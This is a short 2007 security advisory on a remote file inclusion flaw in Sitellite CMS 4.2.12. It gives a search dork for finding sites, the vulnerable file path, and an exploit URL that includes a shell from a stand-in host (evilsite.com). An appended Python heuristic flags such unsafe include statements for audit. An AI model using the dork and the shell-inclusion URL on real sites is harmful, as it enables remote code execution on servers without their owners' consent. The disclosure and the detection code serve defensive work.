securityvulns SECURITYVULNS:DOC:17281
Jun 18, 2007 - 12:00 a.m.

Sitellite cms <= 4.2.12 RFI Vuln


############################################################

Link: http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz

version 4.2.12

Dork : "Powered by Sitellite"

FOUND BY : CarcaBot


Website: http://www.sitellite.org/

DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite

REMOTE FILE INCLUDE

############################################################

FILE :

PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php

############################################################

EXP:

site.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=http://evilsite.com/yourshell.txt?

############################################################

CODE: on line 4

<?php

/** @package tests */

/** include tests */

require_once $FORUM['LIB'] . '/classes/db/PearDb.php';

require PEAR . 'test' . 'me';

include('file.ext');

include 'file.ext';

include(PEAR . 'test' . 'me');

?>

############################################################

http://Hacking.CarcaBot.ro - Romanian Electronic Network Security Lab Team !


Thanks to RENSLT Crew

############################################################

PhpDocumentor directory is .htaccess'ed
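
An audit check for the pattern on line 4, as an added example that is not part of the original advisory: a Python heuristic that flags include/require statements whose path uses a variable the file never assigns, which is how a request parameter can supply $FORUM['LIB'] when PHP's register_globals is on. The function names and regexes are this example's own, and the sample input is the advisory's quoted code with blank lines removed.

```python
import re

# Constructed input: the file body quoted in the advisory, blank lines removed.
SAMPLE = r"""<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>"""

# include/require statement up to its terminating semicolon.
INCLUDE_RE = re.compile(
    r"(?<![$\w>])(?:include|require)(?:_once)?\b\s*\(?\s*(?P<expr>[^;]*);", re.I)
VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
# `$var =` or `$var['k'] =`, but not `==` or `=>`.
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*(?:\[[^\]]*\]\s*)*=(?![=>])")


def strip_comments(src):
    """Blank out comments but keep newlines so line numbers stay valid."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"),
                 src, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(?://|#).*$", "", src)


def find_tainted_includes(src):
    """Return (line, variable, statement) for each include/require whose path
    uses a variable that the file never assigned before that statement."""
    code = strip_comments(src)
    findings = []
    for m in INCLUDE_RE.finditer(code):
        before = code[:m.start()]
        assigned = set(ASSIGN_RE.findall(before))
        for var in VAR_RE.findall(m.group("expr")):
            if var not in assigned:
                findings.append((before.count("\n") + 1, var, m.group(0).strip()))
                break
    return findings


if __name__ == "__main__":
    for line, var, stmt in find_tainted_includes(SAMPLE):
        print(f"line {line}: ${var} reaches include path unassigned: {stmt}")
```

The check is a regex heuristic, not a PHP parser: it ignores control flow and included files, so treat a finding as a prompt for manual review.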